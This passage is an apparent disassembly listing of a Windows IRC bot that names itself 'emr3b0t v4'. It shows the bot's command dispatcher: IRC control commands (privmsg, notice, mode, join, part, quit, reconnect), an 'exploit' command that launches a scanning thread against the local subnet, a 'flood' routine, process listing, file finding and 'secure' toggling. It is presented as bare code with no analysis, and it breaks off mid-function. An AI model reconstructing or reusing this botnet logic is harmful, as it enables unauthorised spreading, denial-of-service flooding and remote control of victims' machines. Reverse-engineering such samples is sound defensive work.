push 27h
call sub_40B99E
test eax, eax
pop ecx
jle short loc_4042EF
cmp [ebp+var_8], ebx
jnz loc_402085
push ebx ; int
push [ebp+var_4] ; int
push offset unk_440B90 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
loc_4042E7: ; CODE XREF: sub_401CC7+72E0�j
add esp, 14h
jmp loc_402085
; ---------------------------------------------------------------------------
loc_4042EF: ; CODE XREF: sub_401CC7+25FE�j
push [ebp+Format] ; Format
lea eax, [ebp+var_B2C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_AA0], eax
mov [ebp+var_AA8], ebx
jz short loc_404350
push esi ; Str2
push offset aFull ; "full"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404350
mov [ebp+var_AA8], 1
loc_404350: ; CODE XREF: sub_401CC7+266C�j
; sub_401CC7+267D�j
lea eax, [ebp+Dst]
push offset asc_440BB8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 27h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_41A7CC
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4043BE
loc_4043A8: ; CODE XREF: sub_401CC7+26F5�j
cmp [ebp+var_A9C], ebx
jnz loc_4098F2
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4043A8
; ---------------------------------------------------------------------------
loc_4043BE: ; CODE XREF: sub_401CC7+26DF�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_440BD4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4098F2
; ---------------------------------------------------------------------------
loc_4043DE: ; CODE XREF: sub_401CC7+17EE�j
; sub_401CC7+1803�j
cmp [ebp+var_8], ebx
jnz short loc_4043FD
push ebx ; int
push [ebp+var_4] ; int
push offset dword_440B68 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_4043FD: ; CODE XREF: sub_401CC7+271A�j
push [ebp+arg_4]
call dword_4E3190 ; closesocket
call dword_4E3050 ; WSACleanup
call sub_4190F6
push ebx
call ds:dword_4F5338 ; ExitProcess
loc_404418: ; CODE XREF: sub_401CC7+17C4�j
; sub_401CC7+17D9�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push eax
call sub_41B92C
pop ecx
pop ecx
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
push offset dword_440B40
jmp short loc_404470
; ---------------------------------------------------------------------------
loc_404443: ; CODE XREF: sub_401CC7+179A�j
; sub_401CC7+17AF�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41BBE0
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
push offset dword_440B18
loc_404470: ; CODE XREF: sub_401CC7+24D4�j
; sub_401CC7+277A�j
call sub_415C3F
add esp, 18h
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_401CC7+1770�j
; sub_401CC7+1785�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415D7C
jmp loc_402082
; ---------------------------------------------------------------------------
loc_404496: ; CODE XREF: sub_401CC7+1746�j
; sub_401CC7+175B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1594], bl
jz short loc_4044D5
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4044D5
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4044D5
push eax
push offset aS_36 ; "%s"
lea eax, [ebp+var_1594]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_4044D5: ; CODE XREF: sub_401CC7+27D8�j
; sub_401CC7+27E3�j ...
push [ebp+Format] ; Format
lea eax, [ebp+var_1614]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1618], eax
mov eax, [ebp+var_4]
mov [ebp+var_1510], eax
mov eax, [ebp+var_8]
mov [ebp+var_150C], eax
lea eax, [ebp+Dst]
push offset asc_440AAC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 25h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_1514], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1618]
push ebx
push eax
push offset sub_415DEF
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1514]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_404578
loc_404562: ; CODE XREF: sub_401CC7+28AF�j
cmp [ebp+var_1508], ebx
jnz loc_402085
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_404562
; ---------------------------------------------------------------------------
loc_404578: ; CODE XREF: sub_401CC7+2899�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440AC4
jmp loc_402269
; ---------------------------------------------------------------------------
loc_404589: ; CODE XREF: sub_401CC7+171C�j
; sub_401CC7+1731�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415BC7
push offset dword_440A88
call sub_415C3F
loc_4045A4: ; CODE XREF: sub_401CC7+2444�j
add esp, 10h
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_4045AC: ; CODE XREF: sub_401CC7+16F2�j
; sub_401CC7+1707�j
push [ebp+Format] ; Format
lea eax, [ebp+var_BC4]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
jz short loc_404606
push offset aSub ; "sub"
push esi ; Str1
call _strcmp
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_B40], eax
jmp short loc_40460C
; ---------------------------------------------------------------------------
loc_404606: ; CODE XREF: sub_401CC7+2923�j
mov [ebp+var_B40], ebx
loc_40460C: ; CODE XREF: sub_401CC7+293D�j
lea eax, [ebp+Dst]
push offset asc_440A20 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 28h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_40B7C1
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40467A
loc_404664: ; CODE XREF: sub_401CC7+29B1�j
cmp [ebp+var_B34], ebx
jnz loc_406F7A
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_404664
; ---------------------------------------------------------------------------
loc_40467A: ; CODE XREF: sub_401CC7+299B�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440A40
jmp loc_4094C9
; ---------------------------------------------------------------------------
loc_40468B: ; CODE XREF: sub_401CC7+1676�j
; sub_401CC7+168B�j
push offset aTrb ; "trb"
push offset asc_4409A8 ; "-"
loc_404695: ; CODE XREF: sub_401CC7+2A0D�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 20h
jmp loc_406F7A
; ---------------------------------------------------------------------------
loc_4046C2: ; CODE XREF: sub_401CC7+164C�j
; sub_401CC7+1661�j
push dword_4E2E1C
call sub_41B76F
pop ecx
push eax
push offset unk_440974
jmp short loc_404695
; ---------------------------------------------------------------------------
loc_4046D6: ; CODE XREF: sub_401CC7+1622�j
; sub_401CC7+1637�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404708
cmp [ebp+var_C], ebx
jz short loc_404717
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_404717
push eax ; Args
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
jmp short loc_404717
; ---------------------------------------------------------------------------
loc_404708: ; CODE XREF: sub_401CC7+2A18�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
pop ecx
pop ecx
loc_404717: ; CODE XREF: sub_401CC7+2A1D�j
; sub_401CC7+2A2C�j ...
push 0FFFFFFFEh
jmp loc_402087
; ---------------------------------------------------------------------------
loc_40471E: ; CODE XREF: sub_401CC7+15F8�j
; sub_401CC7+160D�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
push offset dword_440924
call sub_415C3F
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_402088
; ---------------------------------------------------------------------------
loc_404740: ; CODE XREF: sub_401CC7+15CE�j
; sub_401CC7+15E3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
push offset dword_4408E0
call sub_415C3F
add esp, 0Ch
jmp loc_409A7B
; ---------------------------------------------------------------------------
loc_40475F: ; CODE XREF: sub_401CC7+15A4�j
; sub_401CC7+15B9�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BE3A
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_404775: ; CODE XREF: sub_401CC7+157A�j
; sub_401CC7+158F�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BDE5
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_40478B: ; CODE XREF: sub_401CC7+1550�j
; sub_401CC7+1565�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BD79
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_4047A1: ; CODE XREF: sub_401CC7+1526�j
; sub_401CC7+153B�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BCAA
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_4047B7: ; CODE XREF: sub_401CC7+1481�j
; sub_401CC7+1496�j
push dword ptr [ebp+esi+Args]
push 27h
push offset aProcessList ; "Process list"
push offset dword_4407E4
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4047CF: ; CODE XREF: sub_401CC7+1457�j
; sub_401CC7+146C�j
push dword ptr [ebp+esi+Args]
push 24h
push offset aFindFile ; "Find file"
push offset dword_4407B0
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4047E7: ; CODE XREF: sub_401CC7+1073�j
; sub_401CC7+1088�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_404806
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_404806
push edi ; Str
call _atoi
pop ecx
jmp short loc_40480B
; ---------------------------------------------------------------------------
loc_404806: ; CODE XREF: sub_401CC7+2B29�j
; sub_401CC7+2B34�j
mov eax, dword_43F074
loc_40480B: ; CODE XREF: sub_401CC7+2B3D�j
mov esi, [ebp+esi+Format]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_404830
push esi ; Format
loc_40481D: ; CODE XREF: sub_401CC7+2B78�j
lea eax, [ebp+var_5A0]
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_404847
; ---------------------------------------------------------------------------
loc_404830: ; CODE XREF: sub_401CC7+2B53�j
cmp [ebp+var_8FF], bl
jz short loc_404841
lea eax, [ebp+var_C0]
push eax
jmp short loc_40481D
; ---------------------------------------------------------------------------
loc_404841: ; CODE XREF: sub_401CC7+2B6F�j
mov [ebp+var_5A0], bl
loc_404847: ; CODE XREF: sub_401CC7+2B67�j
mov eax, [ebp+var_4]
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax ; Dest
mov [ebp+var_624], esi
call __snprintf
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_4403B4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 19h ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_411C4E
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4048F8
loc_4048E2: ; CODE XREF: sub_401CC7+2C2F�j
cmp [ebp+var_57C], ebx
jnz loc_402085
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4048E2
; ---------------------------------------------------------------------------
loc_4048F8: ; CODE XREF: sub_401CC7+2C19�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_4403DC
jmp loc_402269
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_401CC7+1009�j
; sub_401CC7+101E�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404929
push esi ; Str
call _atoi
test ax, ax
pop ecx
jz short loc_404929
push esi ; Str
call _atoi
pop ecx
jmp short loc_40492F
; ---------------------------------------------------------------------------
loc_404929: ; CODE XREF: sub_401CC7+2C4B�j
; sub_401CC7+2C57�j
mov ax, word_43F084
loc_40492F: ; CODE XREF: sub_401CC7+2C60�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax ; Dest
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call __snprintf
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_440310 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push edi ; int
push eax ; int
push [ebp+Format] ; Str
push esi ; int
call sub_409D34
push ebx ; int
lea eax, [ebp+Dst]
push 6 ; int
push eax ; Source
call sub_40B756
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40EF74
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4049FE
loc_4049E8: ; CODE XREF: sub_401CC7+2D35�j
cmp [ebp+var_968], ebx
jnz loc_402085
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4049E8
; ---------------------------------------------------------------------------
loc_4049FE: ; CODE XREF: sub_401CC7+2D1F�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44033C
jmp loc_402269
; ---------------------------------------------------------------------------
loc_404A0F: ; CODE XREF: sub_401CC7+FB5�j
; sub_401CC7+FCA�j ...
push edi ; Str2
push offset aSecure_1 ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404A37
push edi ; Str2
push offset aSec_0 ; "sec"
call _strcmp
pop ecx
mov [ebp+var_A10], ebx
test eax, eax
pop ecx
jnz short loc_404A41
loc_404A37: ; CODE XREF: sub_401CC7+2D57�j
mov [ebp+var_A10], 1
loc_404A41: ; CODE XREF: sub_401CC7+2D6E�j
push [ebp+Format] ; Format
lea eax, [ebp+var_A94]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_A10], ebx
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
mov [ebp+var_A08], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_404A88
mov eax, offset aUnsecuring ; "Unsecuring"
loc_404A88: ; CODE XREF: sub_401CC7+2DBA�j
push eax
push offset asc_4402A8 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 22h ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_A14], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_41ACFD
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_A14]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_404AFC
loc_404AE6: ; CODE XREF: sub_401CC7+2E33�j
cmp [ebp+var_A04], ebx
jnz loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_404AE6
; ---------------------------------------------------------------------------
loc_404AFC: ; CODE XREF: sub_401CC7+2E1D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_4402C4
jmp loc_408628
; ---------------------------------------------------------------------------
loc_404B0D: ; CODE XREF: sub_401CC7+F8B�j
; sub_401CC7+FA0�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41B592
loc_404B1E: ; CODE XREF: sub_401CC7+2AA9�j
; sub_401CC7+2ABF�j ...
add esp, 0Ch
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_404B26: ; CODE XREF: sub_401CC7+F61�j
; sub_401CC7+F76�j
push offset unk_4401A4
jmp loc_408850
; ---------------------------------------------------------------------------
loc_404B30: ; CODE XREF: sub_401CC7+F37�j
; sub_401CC7+F4C�j
push offset aEmr3b0tV4 ; "emr3b0t v4"
push offset dword_440184
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_404B3F: ; CODE XREF: sub_401CC7+F0D�j
; sub_401CC7+F22�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404B99
push esi ; Str
call _atoi
cmp eax, ebx
pop ecx
jl short loc_404B91
cmp eax, 3
jge short loc_404B91
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_404B89
lea eax, [esi+1]
push eax
lea eax, [ebp+Dst]
push offset asc_4400E0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
mov [esi], bl
jmp loc_408506
; ---------------------------------------------------------------------------
loc_404B89: ; CODE XREF: sub_401CC7+2EA1�j
push eax
push offset unk_440100
jmp short loc_404BD6
; ---------------------------------------------------------------------------
loc_404B91: ; CODE XREF: sub_401CC7+2E8C�j
; sub_401CC7+2E91�j
push eax
push offset unk_44012C
jmp short loc_404BD6
; ---------------------------------------------------------------------------
loc_404B99: ; CODE XREF: sub_401CC7+2E81�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_404B9E: ; CODE XREF: sub_401CC7+2EF3�j
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404BC1
inc esi
add edi, 80h
cmp esi, 3
jl short loc_404B9E
jmp loc_408506
; ---------------------------------------------------------------------------
loc_404BC1: ; CODE XREF: sub_401CC7+2EE7�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
push offset asc_440158 ; "-"
loc_404BD6: ; CODE XREF: sub_401CC7+2143�j
; sub_401CC7+2EC8�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
jmp loc_408503
; ---------------------------------------------------------------------------
loc_404BE7: ; CODE XREF: sub_401CC7+EE3�j
; sub_401CC7+EF8�j
push dword ptr [ebp+Args] ; Str2
push offset a332_4 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403690
call sub_40B91F
push ebx
call ds:dword_4F5338 ; ExitProcess
loc_404C0D: ; CODE XREF: sub_401CC7+1A02�j
push offset aGet_2 ; "get"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404CA4
cmp dword_4E68F0, ebx
jz short loc_404C39
push offset byte_4E62D0
push offset unk_4412C4
jmp loc_404CD4
; ---------------------------------------------------------------------------
loc_404C39: ; CODE XREF: sub_401CC7+2F61�j
push 10h
pop eax
mov [ebp+var_2D0], eax
push eax ; Size
lea eax, [ebp+var_2E8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call ds:dword_4F554C ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E30]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+var_E30]
push eax
push offset unk_441308
jmp short loc_404CD4
; ---------------------------------------------------------------------------
loc_404CA4: ; CODE XREF: sub_401CC7+2F55�j
push esi
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
push esi ; Source
jnz short loc_404CB8
push offset unk_441340
jmp short loc_404CD4
; ---------------------------------------------------------------------------
loc_404CB8: ; CODE XREF: sub_401CC7+2FE8�j
push offset byte_4E62D0 ; Dest
call _strcpy
pop ecx
mov dword_4E68F0, 1
pop ecx
push esi
push offset asc_441374 ; "-"
loc_404CD4: ; CODE XREF: sub_401CC7+2F6D�j
; sub_401CC7+2FDB�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4036E8
; ---------------------------------------------------------------------------
loc_404CE8: ; CODE XREF: sub_401CC7+19EA�j
push edi ; Str2
push offset aExploit ; "exploit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404DEB
mov eax, [ebp+var_4]
mov esi, offset a2 ; "#2"
mov [ebp+var_13E4], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F4], eax
mov edi, 80h
push esi ; Format
lea eax, [ebp+var_1474]
push edi ; Count
push eax ; Dest
mov [ebp+var_13EC], 1
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_14F4]
push esi ; Format
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1504]
push [ebp+Source] ; Format
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1504]
push eax
lea eax, [ebp+Dst]
push offset asc_4413A8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov [ebp+var_13E8], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1504]
push ebx
push eax
push offset sub_40BF01
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_13E8]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_404DDA
loc_404DC4: ; CODE XREF: sub_401CC7+3111�j
cmp [ebp+var_13DC], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_404DC4
; ---------------------------------------------------------------------------
loc_404DDA: ; CODE XREF: sub_401CC7+30FB�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4413D8
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_404DEB: ; CODE XREF: sub_401CC7+3030�j
push edi ; Str2
push offset aReconnect_in ; "reconnect.in"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A82
push edi ; Str2
push offset aRin ; "rin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A82
push edi ; Str2
push offset aReconnect_in_m ; "reconnect.in.ms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A3A
push edi ; Str2
push offset aRinms ; "rinms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A3A
push [ebp+arg_8] ; Str2
push offset aFlood ; "flood"
call _strcmp
mov edi, ds:dword_4F534C
pop ecx
test eax, eax
pop ecx
jnz loc_4059D2
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
push [ebp+Source] ; Str2
push offset aLoad ; "load"
call _strcmp
add esp, 0Ch
test eax, eax
jnz short loc_404EF1
cmp [ebp+esi+var_80], ebx
jz short loc_404EF1
push [ebp+esi+var_80] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Str2] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Format] ; Source
call sub_4185D2
add esp, 0Ch
lea eax, [ebp+Dst]
push [ebp+esi+Str2]
push [ebp+esi+Format]
push [ebp+esi+var_80]
push offset asc_4414D0 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_8], ebx
jnz short loc_404EF1
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_404EF1: ; CODE XREF: sub_401CC7+31B3�j
; sub_401CC7+31B9�j ...
push [ebp+Source] ; Str2
push offset aPm_1 ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404F5D
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404F5D
push offset asc_441500 ; " "
push offset a__7 ; "_"
push eax ; Src
call sub_418C07
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_404F5D: ; CODE XREF: sub_401CC7+323B�j
; sub_401CC7+3246�j
push [ebp+Source] ; Str2
push offset aCt ; "ct"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404FC9
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404FC9
push offset asc_44151C ; " "
push offset a_ ; "_"
push eax ; Src
call sub_418C07
push eax ; Source
lea eax, [ebp+var_4BF0]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4BF0]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS ; "privmsg %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_404FC9: ; CODE XREF: sub_401CC7+32A7�j
; sub_401CC7+32B2�j
push [ebp+Source] ; Str2
push offset aNt_1 ; "nt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405035
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_405035
push offset asc_44153C ; " "
push offset a__8 ; "_"
push eax ; Src
call sub_418C07
push eax ; Source
lea eax, [ebp+var_46EC]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_46EC]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "notice %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_405035: ; CODE XREF: sub_401CC7+3313�j
; sub_401CC7+331E�j
push [ebp+Source] ; Str2
push offset aMode ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4050A1
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_4050A1
push offset asc_44155C ; " "
push offset a__0 ; "_"
push eax ; Src
call sub_418C07
push eax ; Source
lea eax, [ebp+var_4DF0]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4DF0]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aModeSS ; "mode %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_4050A1: ; CODE XREF: sub_401CC7+337F�j
; sub_401CC7+338A�j
push [ebp+Source] ; Str2
push offset aJoin ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4050E0
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_4050E0
push eax
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_4050E0: ; CODE XREF: sub_401CC7+33EB�j
; sub_401CC7+33F6�j
push [ebp+Source] ; Str2
push offset aPart_1 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40511F
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_40511F
push eax
